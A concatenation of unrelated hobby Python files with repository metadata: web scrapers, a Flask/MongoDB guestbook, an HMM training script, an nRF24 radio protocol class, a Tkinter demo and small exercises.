] | permissive | Sandy4321/cli_stats | feec6e6b234e40062f0fe5b6519fdca0fc93f31b | d8a75cf81904a0565c9de6839ee4711355e26b70 | refs/heads/master | 2023-02-10T11:06:46.602325 | 2021-01-01T22:50:31 | 2021-01-01T22:50:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Compute the average of a number stream on stdin
Author: Gertjan van den Burg
License: See LICENSE file
Copyright (c) 2020, G.J.J. van den Burg
"""
import sys
def main():
total = 0.0
count = 0
for line in sys.stdin:
if not line.strip():
continue
total += float(line.strip())
count += 1
average = total / count
print(average)
if __name__ == "__main__":
main()
| [
"gertjanvandenburg@gmail.com"
] | gertjanvandenburg@gmail.com | |
feeba3de11c1896233c77e78c768f44cee7819c0 | b761d738cce8d1d6be860f0bd7250c21d25abcc6 | /urlread.py | e78a63fcfaeb89d07c8b6b50becf24a0a5523e02 | [] | no_license | leoninnovate/crawlers | 46c02f760aae19c9f52eabb070cfdaacca521aee | 6e4120165d3227cbdafaba530cc6cbb8bf5c09dd | refs/heads/master | 2021-01-20T16:45:21.685464 | 2014-06-11T15:47:30 | 2014-06-11T15:47:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,967 | py | import urllib, urllib.request
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import time
list_a = []
##list_name = []
list_link = []
##list_rating = []
##list_imageurl = []
##list_review = []
##list_user_rating = []
##list_rank = []
list_det=[]
##t=time.process_time()
t=time.time()
##url = "http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html"
url = input("Enter URL: ")
start = url
##p = urllib.request.urlopen(url)
check=0
while True:
try:
p = urllib.request.urlopen(url)
source = p.read()
p.close()
soup = BeautifulSoup(source)
r = soup.find_all('div', class_="orphan hotelsCount")[0].select('b')[0].string
## print(r)
## print(type(r))
check=int(r.replace(" ", ""))
## print(check)
break
except:
print("URL exception")
## print(o)
## o=o+1
continue
i=0
print(check)
while True:
## if(i==1):
## break
##
try:
p = urllib.request.urlopen(url)
except IOError:
print("URL exception")
continue
source = p.read()
p.close()
soup = BeautifulSoup(source)
a=soup.prettify()
x = a.split("var lazyImgs = [")[1].split("]")[0]
##for i in x:
## if i == ',':
## x.remove(i)
##print(x)
list_divs = soup.find_all("div", class_="listing wrap")
##print(list_divs[0].find_all('a', class_='property_title')[0].string)
##print(list_divs[0].find_all('a', class_='property_title')[0]['href'])
for item in list_divs:
b=item.find_all('a', class_='property_title')[0]['href']
if(b in list_link):
continue
dict_det = {}
a=item.find_all('a', class_='property_title')
if(a == []):
## list_name.append(None)
dict_det['Hotel name'] = None
else:
## list_name.append(a[0].string.replace("\n", ""))
dict_det['Hotel name'] = a[0].string.replace("\n", "")
if(b==None):
list_link.append(None)
dict_det['Details URL'] = None
else:
list_link.append( b)
dict_det['Details URL'] = urllib.parse.urljoin('http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html', b)
c=item.find_all('img', class_='sprite-ratings-gry')
if(c==[]):
## list_rating.append(None)
dict_det['Star rating'] = None
else:
## list_rating.append(c[0]['alt'].replace("\n", ""))
dict_det['Star rating'] = c[0]['alt'].replace("\n", "")
d=item.find_all('img', class_='photo_image')
if(d==[]):
## list_imageurl.append(None)
dict_det['Image URL'] = None
else:
## list_imageurl.append(x.split(d[0]['id'])[1].split('"data":"')[1].split('"}')[0])
dict_det['Image URL'] = x.split(d[0]['id'])[1].split('"data":"')[1].split('"}')[0]
e=item.find_all('span', class_='more')
if(e == []):
## list_review.append(None)
dict_det['Number of reviews'] = None
else:
## list_review.append(e[0].find_all('a')[0].string.replace("\n", ""))
dict_det['Number of reviews'] = e[0].find_all('a')[0].string.replace("\n", "")
f=item.find_all('img', class_='sprite-ratings')
if(f==[]):
## list_user_rating.append(None)
dict_det['User rating'] = None
else:
## list_user_rating.append(f[0]['alt'].replace("\n", ""))
dict_det['User rating'] = f[0]['alt'].replace("\n", "")
g=item.find_all('div', class_='slim_ranking')
if(g == []):
## list_rank.append(None)
dict_det['Ranking'] = None
else:
## list_rank.append(g[0].string.replace("\n", ""))
dict_det['Ranking'] = g[0].string.replace("\n", "")
## print(dict_det)
list_det.append(dict_det)
if(int(len(list_det)) == int(check)):
## i=1
break
if(soup.find_all('span', class_='guiArw pageEndNext')!=[]):
n=start
print(len(list_name))
print("again")
else:
n=soup.find_all('a', class_='guiArw sprite-pageNext ')[0]['href']
## print(n)
url = urllib.parse.urljoin(url,n)
## print(url)
## p = urllib.request.urlopen(url)
##time = time.process_time() - t
time = time.time() - t
for i in range(len(list_det)):
print(list_det[i])
print("\n")
## print("Hotel name: ", list_name[i])
## print("Details Page URL: ", list_link[i])
## print("Star Rating: ",list_rating[i])
## print("Image URL: ",list_imageurl[i])
## print("Number of reviews: ",list_review[i])
## print("User Rating: ",list_user_rating[i])
## print("Rank of Hotel: ", list_rank[i])
## print('\n')
##print(type(len(list_name)))
##print("Hotel name: ", list_name)
##print(list_link)
##print("Star Ratings: ",list_rating)
##print("Image URLs: ",list_imageurl)
##print("Number of reviews: ",list_review)
##print("User Ratings: ",list_user_rating)
##print(list_rank)
##
##print(len(list_name))
##print(len(list_link))
##print(len(list_rating))
##print(len(list_imageurl))
##print(len(list_review))
##print(len(list_user_rating))
##print(len(list_rank))
print(len(list_det))
print(time)
##print(list_divs[2].find_all('img', class_='photo_image'))
"""
##print(list_divs[4].find_all('img', class_='sprite-ratings-gry'))
##list = soup.find_all('a', class_='property_title')
##print(list[0].string)
##a=list[0]['href']
##print(list[0]['href'])
##print(urllib.parse.urljoin('http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html', a))
##i=0
##
##for item in list:
## list_name.append(list[i].string)
## list_link.append(urllib.parse.urljoin('http://www.tripadvisor.in/Hotels-g294217-Hong_Kong-Hotels.html', item['href']))
## try:
## if soup.find_all("img", class_="sprite-ratings-gry")[i]['alt']:
## print ('yes')
## else:
## print ('no')
## except Exception as e:
## print (e)
## list_rating.append(soup.find_all("img", class_="sprite-ratings-gry")[i]['alt'])
## i=i+1
##
##
##
##print(len(list_name))
##print(len(list_link))
##print(len(list_rating))
##rating = soup.find_all("img", class_="sprite-ratings-gry")
##for a in rating:
## list_rating.append(a['alt'])
##print(len(list_rating))
####print(rating)
##print(rating[0]['alt'])
#for item in s:
# list_a = item.find_all('a', class_='property_title')
# print(list_a)
##s = "<html><div>test</div><ul><li>1</li><li>2</li><li>3</li></ul></html>"
##
##soup = BeautifulSoup(s)
####print(soup.prettify())
##list = []
##i=1
##for child in (soup.ul.find_all()):
#### print(child.text)
## list.insert(int(child.text), i)
## i=i+1
"""
| [
"pranavchadha97@gmail.com"
] | pranavchadha97@gmail.com |
c1e242e1368825c4e5fb8b261aa43cb69ee38053 | c90ea430905d7e2129f86a639ddcecbbfcac1432 | /collector.py | 54dabfc9acda354b36104278c96955b5d940c1bd | [] | no_license | Hamedasd/ADM_HM3 | 8c2254ba1668edbbd3481bcaf652d48a89301d76 | 62c148fd48ee05420aa608098f123f07c311e41b | refs/heads/master | 2020-09-08T16:20:37.420017 | 2019-11-17T22:52:42 | 2019-11-17T22:52:42 | 221,182,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | import csv , os, glob , random, time , codecs
import pandas as pd
import requests, urllib
from bs4 import BeautifulSoup
import time
import random
from collector_utils import WRITER
# here are the links to collect
# first we need to prepare all of the links in a list
url_1 = 'https://raw.githubusercontent.com/CriMenghini/ADM/master/2019/Homework_3/data/movies1.html'
url_2 = 'https://raw.githubusercontent.com/CriMenghini/ADM/master/2019/Homework_3/data/movies2.html'
url_3 = 'https://raw.githubusercontent.com/CriMenghini/ADM/master/2019/Homework_3/data/movies3.html'
# collect all of the urls in a list named url_list
# It's the collection of all urls
url_list = []
for url in [url_1 , url_2 , url_3]:
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
for link in soup.find_all('a'):
url_list.append(link.get('href'))
for i ,link in enumerate(url_list):
try:
response = requests.get(link)
except requests.exceptions.RequestException as e:
E.append(e)
time.sleep(random.choice(range(1,4)))
response = requests.get(link)
soup = BeautifulSoup(response.text, 'html.parser')
WRITER(i , soup)
time.sleep(random.choice(range(1,4)))
| [
"noreply@github.com"
] | noreply@github.com |
fd940defda52fa51525d363b999c08ca8aed92f5 | 46076bec231e0e36c8bd90165b786371af0fe402 | /web/app.py | 2e005cc3bef68ffd1e9aec9f816be8c54eebb828 | [] | no_license | willgleich/mongogb | d0637819adbb3fd9f818890c1aa976766fc49238 | 46076055552c4b4f23b3f17c06140e5bdbd057ed | refs/heads/master | 2020-03-22T14:59:08.807516 | 2018-07-12T01:16:37 | 2018-07-12T01:16:37 | 140,220,144 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,085 | py | import pymongo
from flask import Flask, redirect, url_for, request, render_template, g, jsonify, flash, session
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
import os, datetime
import analytics
from io import BytesIO
import base64
import matplotlib
import urllib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
app = Flask(__name__)
auth = HTTPBasicAuth()
app.config['SECRET_KEY'] = os.urandom(24)
# dbconfig
client = pymongo.MongoClient(
os.environ['DB_PORT_27017_TCP_ADDR'],
27017)
db = client.guestbook
@app.route('/')
def index():
if session.get('logged_in'):
return render_template('index.html', user=session.get('username'))
return render_template('index.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if session.get('logged_in'):
return redirect(url_for('index'))
if request.method == 'POST':
if not ver_password(request.form['username'], request.form['password']):
return render_template('login.html', status='IncorrectPassword')
session['logged_in'] = True
session['username'] = request.form['username']
return redirect(url_for('create_post'))
return render_template('login.html')
@app.route('/logout', methods=['GET', 'POST'])
def logout():
session['logged_in'] = False
session['username'] = ''
return render_template('index.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
user_doc = {
'_id': request.form['username'],
'name': request.form['username'],
'password': generate_password_hash(request.form['password']),
'email': request.form['email']
}
try:
db.users.insert_one(user_doc)
except pymongo.errors.DuplicateKeyError:
status = '**ERROR** User with that name has already registered'
flash(status)
return render_template('register.html')
status = 'Registered Successfully'
flash(status)
session['logged_in'] = True
session['username'] = request.form['username']
return redirect(url_for('create_post'))
return render_template('register.html')
@app.route('/change_password', methods=['GET', 'POST'])
def change_password():
if request.method == 'POST':
if not ver_password(session['username'], request.form['currentPassword']):
return render_template('change_password.html', status='IncorrectPassword')
else:
db.users.update_one({"_id": session['username']},
{'$set': {"password": generate_password_hash(request.form['newPassword'])}})
flash('Password updated')
return render_template('change_password.html')
@app.route('/posts', methods=['GET'])
def posts():
_posts = db.posts.find()
posts = [item for item in _posts]
return render_template('posts.html', posts=reversed(posts))
@app.route('/create', methods=['GET', 'POST'])
def create_post():
if not session.get('logged_in'):
return render_template('unauthorized.html')
if request.method == 'POST':
post_doc = {
'author': session['username'],
'post': request.form['comment'],
'time': datetime.datetime.now()
}
db.posts.insert_one(post_doc)
return redirect(url_for('posts'))
return render_template('create_post.html')
@app.route('/analytics/top', methods=['GET'])
def top_analytics():
df_html = analytics.top_users_dataframe()
img = BytesIO()
df_graph = analytics.top_users_graph()
matplotlib.pyplot.savefig(img, format='png')
img.seek(0)
plot_url = urllib.parse.quote(base64.b64encode(img.read()).decode())
return render_template('analytics/top_analytics.html', top_users = df_html, plot_url=plot_url)
def ver_password(username, password):
user = db.users.find_one({'_id': username})
if not user or not check_password_hash(user['password'], password):
return False
return True
@app.route("/getip", methods=["GET"])
def get_my_ip():
return jsonify({'ip': request.remote_addr}), 200
def time_difference(then):
'''takes in a datetime object from a previous point in time
returns mins, seconds, hours, days, years ago
TODO: add in later minutes and clean up this code'''
delt = datetime.datetime.now() - then
if delt.seconds < 60:
return str(delt.seconds) + ' seconds ago'
elif delt.seconds < 60 * 60:
return str(delt.seconds // 60) + ' minutes ago'
elif delt.seconds < 60 * 60 * 24:
return str(delt.seconds // 3600) + ' hours ago'
elif delt.days < 365:
return str(delt.days) + ' days ago'
else:
return str(delt.days // 365) + ' years ago'
if __name__ == "__main__":
for i in range(25,0,-1):
analytics.populate_mongodb(minutes_ago=i)
app.jinja_env.globals.update(time_difference=time_difference)
app.run(host='0.0.0.0', debug=True)
| [
"wgleich@gmail.com"
] | wgleich@gmail.com |
6b5b168212ea389d9a1bf3925742513ee086a11a | 362305437647e60b76fcea2994ef365d0f880087 | /custom_components/aliu24/aliu0_protocol.py | 12a57c134ffee7ea2ed17d0a780877f7ba739be4 | [] | no_license | pys1024/homeassistant | 165e7d9ba5b799242f3da8a9d6090836e1e4f8e7 | 489ea0148bd01b2a6d8a029578fbd62997c7e7b2 | refs/heads/master | 2020-09-12T16:13:01.156437 | 2019-11-18T14:57:49 | 2019-11-18T14:57:49 | 222,475,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,206 | py | import RPi.GPIO as gpio
from nrf24 import NRF24
import time
class Aliu0_protocol:
'''自定义通信协议V1.0说明
通信协议结构:
通信指令(1字节)+操作数据(1字节)+设备编号(1字节)+发送方地址(5字节)+附加数据(24字节)
发送方地址能让接收方知道指令由谁发起,附加数据根据指令利用,一般不用
'''
# 主机与子机通信指令
DEVICE_STATE = 0XA6 #返回设备当前的状态,没有操作数据
DEVICE_TYPE = 0XAF #返回当前设备的类型,没有操作数据
SET_STATE = 0XB9 #设置设备的状态
LOCK_STATE = 0X86 #锁定设备的状态
REQUEST_STATE = 0X83 #请求设备的状态
REQUEST_TYPE = 0X3A #请求设备的类型
# 设备状态
DISCONNECTED = 0XF9 #represent device disconnected
STATE_ON = 0X03 #开启状态
STATE_OFF = 0X34 #关闭状态
STATE_0 = 0X73 #状态0
STATE_1 = 0X74 #状态1
STATE_2 = 0X75 #状态2
STATE_3 = 0X76 #状态3
STATE_4 = 0X77 #状态4
STATE_5 = 0X78 #状态5
# 设备种类
TYPE_SWITCH = 0XC3 #设备控制开关类型,开关两种状态
TYPE_SENSOR = 0XD8 #传感器类型,开关两种状态
TYPE_TEMP = 0X3D #温度传感器类型,返回温度数值
TYPE_TIME = 0X5B #计时器类型,返回时间信息
TYPE_LIGHT = 0X9F #光强传感器类型,返回光照强度
TYPE_DISTANCE = 0X1C #距离传感器类型,返回距离数值
# 其他
NOTHING = 0X64 #无
def __init__(self, bus, ce, irq, host_addr, slave_base):
"""Initialize"""
self._host_addr = host_addr
self._slave_addr = [0x00] + slave_base
self._tx_pack = [0]*32
self._tx_pack[0] = self.SET_STATE
self._tx_pack[1] = self.STATE_ON
self._tx_pack[3:8] = self._host_addr
self._rx_pack = [0]
self._radio = NRF24()
self._radio.begin(0, bus, ce, irq)
self._radio.setRetries(15,15)
self._radio.setPayloadSize(32)
self._radio.setChannel(0x40)
self._radio.setDataRate(NRF24.BR_2MBPS)
#radio.setPALevel(NRF24.PA_MAX)
#radio.setAutoAck(0)
#radio.setAutoAckPipe(0, True)
#radio.setAutoAckPipe(1, True)
#radio.setCRCLength(NRF24.CRC_16)
self._radio.openWritingPipe(self._slave_addr)
self._radio.openReadingPipe(1, self._host_addr)
#self._radio.startListening()
#self._radio.stopListening()
# radio.printDetails()
def _send_pack(self,retry):
count = 0
while count <= retry:
count += 1
sta = self._radio.write(self._tx_pack)
if sta == 1:
return True
return False
def set_on(self, addr, id):
self._tx_pack[0] = self.SET_STATE
self._tx_pack[1] = self.STATE_ON
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def set_off(self, addr, id):
self._tx_pack[0] = self.SET_STATE
self._tx_pack[1] = self.STATE_OFF
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def lock_on(self, addr, id):
self._tx_pack[0] = self.LOCK_STATE
self._tx_pack[1] = self.STATE_ON
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def lock_off(self, addr, id):
self._tx_pack[0] = self.LOCK_STATE
self._tx_pack[1] = self.STATE_OFF
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def request(self, addr, id):
self._tx_pack[0] = self.REQUEST_STATE
self._tx_pack[1] = self.DEVICE_STATE
self._tx_pack[2] = id
self._slave_addr[0] = addr
self._radio.openWritingPipe(self._slave_addr)
self._radio.stopListening()
sta = self._send_pack(5)
self._radio.startListening ()
return sta
def get_data (self):
pipe = [0]
data = [False, 0x00, 0, False] # status, device_addr, device_id, device_state
if self._radio.available (pipe, False, 1):
self._radio.read (self._rx_pack)
if self._rx_pack [0] == self.DEVICE_STATE:
data [0] = True
data [1] = self._rx_pack [3]
data [2] = self._rx_pack [2]
data [3] = self._rx_pack [1] == self.STATE_ON
return data
def __del__ (self):
self._radio.end()
| [
"pys910@gmail.com"
] | pys910@gmail.com |
2c4fe8015968b8a78c7b2ea33ac5e21e01c82e6e | 75e99f1c3ba477a582a81aa22b8da0910c900134 | /bookstore/book/migrations/0003_auto_20180403_1401.py | f79af6ae4ee376ce12744797a99ed3339d1d8bb4 | [] | no_license | wuyumeng/bookstore | 1676f04f8f2d1a5fe8ff21bb3722c6def2459bc5 | ac6a58ebae98bfe2bed5fc6237cbca92c31c61de | refs/heads/master | 2020-03-09T09:05:49.883480 | 2018-04-09T02:46:03 | 2018-04-09T02:46:03 | 128,704,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('book', '0002_auto_20180402_2344'),
]
operations = [
migrations.CreateModel(
name='HeriInfo',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('hcontent', tinymce.models.HTMLField()),
],
),
migrations.AlterField(
model_name='books',
name='type_id',
field=models.SmallIntegerField(verbose_name='商品种类', default=1, choices=[('ALGORITHMS', '数据结构与算法'), ('OPERATINGSYSTEM', '操作系统'), ('DATABASE', '数据库'), ('JAVASCRIPT', 'javascript'), ('MACHINELEARNING', '机器学习'), ('PYTHON', 'python')]),
),
]
| [
"18732429547@163.com"
] | 18732429547@163.com |
122af83da8a2175b1e1c714e728d2bc9051068ae | 46a5338c5979c54e335af3d5a0523d5325845a0d | /python/fishsey/template/_tkinter.py | a7b44a26e02ff0b1ebcf2fc20be1522197305034 | [] | no_license | fishsey/code | 658284367b8435fa233a473341b90d746330a873 | b4275042e18ee02eb29ee285df7dce6d4d31a0c4 | refs/heads/master | 2021-07-11T18:57:11.052981 | 2017-10-06T11:15:35 | 2017-10-06T11:15:35 | 105,975,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,393 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 06 21:07:30 2016
@author: fishsey
"""
from numpy import *
from Tkinter import *
import matplotlib
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
def reDraw(x, y):
reDraw.f.clf() # clear the figure
reDraw.a = reDraw.f.add_subplot(111)
reDraw.a.plot(x, y, linewidth=2.0) #use plot for yHat
reDraw.canvas.show()
def drawNewTree():
import numpy as np
x = np.arange(10)
y = x * 2 + 3
reDraw(x, y)
root=Tk()
#matplotlib 画布
reDraw.f = Figure(figsize=(5,4), dpi=100) #create canvas
reDraw.canvas = FigureCanvasTkAgg(reDraw.f, master=root)
reDraw.canvas.show()
reDraw.canvas.get_tk_widget().grid(row=0, columnspan=3)
#label1
Label(root, text="tolN").grid(row=1, column=0)
tolNentry = Entry(root)
tolNentry.grid(row=1, column=1)
tolNentry.insert(0,'10')
#label2
Label(root, text="tolS").grid(row=2, column=0)
tolSentry = Entry(root)
tolSentry.grid(row=2, column=1)
tolSentry.insert(0,'1.0')
#按钮
Button(root, text="ReDraw", command=drawNewTree).grid(row=3, column=0, columnspan=1)
#复选框
chkBtnVar = IntVar()
chkBtn = Checkbutton(root, text="Model Tree", variable = chkBtnVar)
chkBtn.grid(row=3, column=1, columnspan=2)
root.wm_resizable(800, 400)
#root.wm_state('zoomed') #全屏
root.mainloop() | [
"ally1984aikx@gmail.com"
] | ally1984aikx@gmail.com |
228838743a4a17ff71de267f94269836b84c585b | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/bak.py | 12452944e2d8adaa5868f756dd6e5ad813124986 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'bAK':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
ef78a74713a122e3ad23d10048cdc826d0c26434 | b94f639d4c5a499f578d18762809cd91c7f7e934 | /foodsubstitution/views/__init__.py | f05b5e1fd27c98ea040bc543cb14dbe68b684d0b | [] | no_license | MCiret/P5_PurBeurre-Food-Substitution_DA-Python | d55facb48bf75baa532b0398f9cecd2a00570c50 | 038dbe9b7735bcf512c612de91487c7ea769c9b1 | refs/heads/master | 2023-04-01T04:06:23.500965 | 2021-04-07T15:29:30 | 2021-04-07T15:29:30 | 341,870,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from .data_init_view import DataInitView
from .main_menu_view import MainMenuView
from .cat_view import CatView
from .food_view import FoodView
from .substitution_view import SubstitutionView
from .bookmarking_view import BookmarkingView
from .read_bookmarks_view import ReadBookmarksView
| [
"ciret.m@gmail.com"
] | ciret.m@gmail.com |
942a6a475150a440d2d71c36555b3b9649d6eb26 | ad0857eaba945c75e705594a53c40dbdd40467fe | /baekjoon/python/dial_5622.py | 2f52057085043af2b8abff6075f383071902aa85 | [
"MIT"
] | permissive | yskang/AlgorithmPractice | c9964d463fbd0d61edce5ba8b45767785b0b5e17 | 3efa96710e97c8740d6fef69e4afe7a23bfca05f | refs/heads/master | 2023-05-25T13:51:11.165687 | 2023-05-19T07:42:56 | 2023-05-19T07:42:56 | 67,045,852 | 0 | 0 | null | 2021-06-20T02:42:27 | 2016-08-31T14:40:10 | Python | UTF-8 | Python | false | false | 494 | py | # https://www.acmicpc.net/problem/5622
def dial_time(digit_string):
digit_dict = {"A": 2, "B": 2, "C": 2, "D": 3, "E": 3, "F": 3, "G": 4, "H": 4, "I": 4, "J": 5, "K": 5, "L": 5,
"M": 6, "N": 6, "O": 6, "P": 7, "Q": 7, "R": 7, "S": 7, "T": 8, "U": 8, "V": 8, "W": 9, "X": 9,
"Y": 9, "Z": 9}
time = 0
for d in digit_string:
time += (digit_dict[d] + 1)
return time
if __name__ == "__main__":
print(dial_time(input()))
| [
"yongsung.kang@gmail.com"
] | yongsung.kang@gmail.com |
e3b8499d35ca0953884bd83aaecd543105bc25fd | c07ae35b94c770cdfde26a3084ca13560a29113b | /8 kyu/Convert a string to an array.py | 6ea6f5f958966bab3497f1146c97a3649ccefce8 | [] | no_license | Djusk8/CodeWars | 2f860efdf9c93e02170a61bd3345c1a6c57b85f0 | 75cdaaab3f9152032aeaa05d06ef67599aff710b | refs/heads/master | 2021-06-24T09:33:33.393342 | 2021-03-22T06:19:56 | 2021-03-22T06:19:56 | 208,574,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,666 | py | # ------------ KATA DESCRIPTION ------------
"""
8 kyu - Convert a string to an array
Write a function to split a string and convert it into an array of words. For example:
"Robin Singh" ==> ["Robin", "Singh"]
"I love arrays they are my favorite" ==> ["I", "love", "arrays", "they", "are", "my", "favorite"]
"""
# --------------- SOLUTION ---------------
import codewars_test as Test
# while s.split(" ") is the easiest solution with build0in functions, I want to get some practice and write my own func
# to split a string
def string_to_array(s):
result = []
tmp = ""
for ch in s:
if ch == " ":
result.append(tmp)
tmp = ""
else:
tmp += ch
result.append(tmp) # add to result the last word in string
return result
# --------------- TEST CASES ---------------
Test.describe("Basic tests")
Test.assert_equals(string_to_array("Robin Singh"), ["Robin", "Singh"])
Test.assert_equals(string_to_array("CodeWars"), ["CodeWars"])
Test.assert_equals(string_to_array("I love arrays they are my favorite"), ["I", "love", "arrays", "they", "are", "my", "favorite"])
Test.assert_equals(string_to_array("1 2 3"), ["1", "2", "3"])
Test.assert_equals(string_to_array(""), [""])
Test.describe("Random tests")
from random import randint
sol=lambda s: s.split(" ")
base="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
for _ in range(40):
s=" ".join(["".join([base[randint(0,len(base)-1)] for q in range(randint(1,20))]) for k in range(randint(1,15))])
Test.it("Testing for "+repr(s))
Test.assert_equals(string_to_array(s),sol(s),"It should work for random inputs too") | [
"djusk8@gmail.com"
] | djusk8@gmail.com |
83ded1637f014ddd7d1d74a9b794caa77f7d598e | affd224383562562739623c7d63303c12efce568 | /source/CreateHMMparameter/CreateHMMparameter/CreateHMMparameter.py | aa79846373f87c422e7971ce118924dc0fcd2168 | [] | no_license | shiori-yokota/DataAnalysis | 24156474229969d68cdf296df353e538e8066f25 | 938c26e09c9bef5146af911a0c9be2d2ccceae66 | refs/heads/master | 2020-04-07T05:03:43.283524 | 2018-03-07T05:22:51 | 2018-03-07T05:22:51 | 124,183,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,014 | py | # -*- coding: utf-8 -*- #
import glob
from hmmlearn import hmm
import numpy as np
from sklearn.mixture import GMM
from sklearn.externals import joblib, joblib
import sklearn
EvmPath = "..\\..\\..\\"
compornents = 8 ## State number of HMM
mix = 10 ## Mixture number of GMM
LearningData = []
#### LEARNING ####
for motionID in glob.glob(EvmPath + 'MotionData\\Learning\\*'):
print("Motion id: " + str(motionID))
models = []
'''
GMMHMM(algorithm='viterbi', covariance_type='diag', covars_prior=0.01,
init_params='stmcw', n_components=5, n_iter=10, n_mix=1,
params='stmcw', random_state=None, startprob_prior=1.0, tol=0.01,
transmat_prior=1.0, verbose=False)
init_params : string, optional
Controls which parameters are initialized prior to training. Can
contain any combination of 's' for startprob, 't' for transmat, 'm'
for means, 'c' for covars, and 'w' for GMM mixing weights.
Defaults to all parameters.
params : string, optional
Controls which parameters are updated in the training process. Can
contain any combination of 's' for startprob, 't' for transmat, 'm' for
means, and 'c' for covars, and 'w' for GMM mixing weights.
Defaults to all parameters.
'''
model = hmm.GMMHMM(n_components = compornents, n_iter = 100, n_mix = mix,
verbose = True, init_params = 'cmw', params = 'mctw', covariance_type = 'full')
transmat = np.zeros((compornents, compornents))
## Left-to-right: each state is connected to itself and its direct successor.
## Correct left-to-right model
for i in range(compornents):
if i == compornents - 1:
transmat[i, i] = 1.0
else:
transmat[i, i] = transmat[i, i + 1] = 0.5
print(transmat)
## Always start in first state
startprob = np.zeros(compornents)
startprob[0] = 1.0
model.transmat_ = transmat
model.startprob_ = startprob
gmms = []
for i in range(0, compornents):
gmms.append(sklearn.mixture.GMM())
model.gmms_ = gmms
## motion data ##
motions = []
lengths = []
for file in glob.glob(motionID+'\\*.dat'):
print(file)
motion = []
escapes = []
for line in open(file): ## select motion
if '0.0,11,0' in line:
print('header: ' + str(line))
headerName = line[:-1].split('\t')
for i, item in enumerate(headerName):
if 'Avatar' in item:
escapes.append(i)
else:
data = line[:-1].split('\t')
# print('data: '+str(data))
tmpPose = []
for i, item in enumerate(data):
if i in escapes:
# print(i, item)
tmpItem = item[:-1].split(',')
for j in tmpItem:
tmpPose.append(float(j))
motion.append(tmpPose)
motions.append(motion)
lengths.append(len(motion))
## CREATE HMM PARAMETER ##
X = np.concatenate(motions)
model.fit(X, lengths)
print(model.transmat_)
for line in model.transmat_:
sum = 0.0
for one in line:
sum += one
print('sum: ' + str(format(sum, '.15f')))
if round(sum, 4) != 1.0:
input('check sum error >>> ')
models.append(model)
joblib.dump(model, motionID + '\\' + motionID[-1:] + '.pkl')
| [
"e1252225@gmail.com"
] | e1252225@gmail.com |
cbeded83233e21772af0637b2dcdb72d5adbec0e | 73ecfa0be6ae649c3eb1847436c9feeb96895b72 | /es_python/basi.py | a2987c233d46812f5ce14c097544147800515ac6 | [] | no_license | MellanoMatteo/Sistemi | b4146bfe723071bf01a2b3a8eaea355928f0775c | dfcee7b8e0bcc0bd0bfe1c8590918da9e0850284 | refs/heads/main | 2023-03-27T03:50:35.767954 | 2021-03-26T08:36:01 | 2021-03-26T08:36:01 | 317,488,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,446 | py |
lista = [1, 2, 4, "ciao"]
lista.append("aggiungo in coda un altro elemento")
print(lista[0:4]) #stampo gli elementi della lista dal 0 al 3
print(lista[3:]) #stampo i valori della lista dal numero inserito fino alla sua fine (discorso uguale ma inverso per stampare dall'inizio fino ad un certo punto, che sarà però escluso)
stringa = "matteomellano"
#discorso delle liste uguale per le strighe, e sarà anche uguale per le iterazioni
